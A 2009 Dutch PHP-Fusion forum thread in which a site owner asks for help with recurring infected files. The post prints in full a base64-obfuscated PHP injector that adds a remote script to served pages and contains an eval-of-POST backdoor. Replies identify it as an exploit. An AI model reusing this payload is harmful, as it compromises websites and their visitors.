Thread subject: pHpFusion Nederlands (BE|NL) » Ondersteuning, Themas, Infusies, Modificaties en Installatie :: Eval Code op de website,

Posted by WalkeR on 25 October 2009, 09:30
#1
Beste Fusion gebruikers,

Ik zit met een groot probleem en dat is het volgende, ik heb een fuison site geinstalleerd wat gemodificeerd en wat infusions geplaatst zoals het hoort.

Nu krijg ik al 2x in een paar weken tijd de volgende fout:

Code

Fatal error: Cannot redeclare s3op() (previously declared in /home/vhosts/rkjvvactief.nl/httpdocs/infusions/user_gold/infusion_db.php(1) : eval()'d code:1) in /home/vhosts/rkjvvactief.nl/httpdocs/infusions/user_gold/inc/dbcalls.inc.php(1) : eval()'d code on line 1



en dat is niet het enige bestand wat mij geinfecteerd lijkt met een virus als ik deze tekst uit het bestand haal:

eval(base64_decode('aWYoIWlzc2V0KCRzM29wMSkpe2Z1bmN0aW9uIHMzb3AoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzUmhiR1Z1ZEhKbGRISnBaWFpsY2k1amIyMHZZbXh2Wnk5b2FYSnBibWN1Y0dod0lENDhMM05qY21sd2REND0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIHMzb3AyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHMzb3AxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRzM29wMSkpY2FsbF91c2VyX2Z1bmMoJHMzb3AxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3Mzb3AnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnczNvcCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRzM29wbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignczNvcDInKSkhPSdzM29wMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>


dan komt er weer een nieuwe bestand met dit soort ongein terug. Wie weet wat dit inhoud en wat ik er aan kan doen? Zou ik dit bij me hosting moeten navragen ?

Gr WalkieTalkie
Edited by Steff on 25 October 2009, 09:46

Posted by Steff on 25 October 2009, 09:47
#2
Ik zou dit zo snel mogelijk Verwijderen dit is waarschijnlijk een hack/exploit. Die hash die je daar ziet is een base64 encoded script dat hij probeert uit te voeren. Die error die je daar ziet betekent dat hij dat script al eens eerder wou uitvoeren. Dus verwijder het asap !

Posted by WalkeR on 25 October 2009, 09:54
#3
Hee Jeepers, ik weet dat ik dat zo snel mogelijk moet verwijderen, maar het punt is dat ik dat ook doe maar telkens komt het weer terug, zou die door mijn host komen?

wat kan ik hier aan doen dat het niet meer terug komt?

Gr

Posted by Steff on 25 October 2009, 09:55
#4
Zoals ik al zij door een exploit in een of andere infusion waardoor hij toegang krijgt om bestanden te bewerken .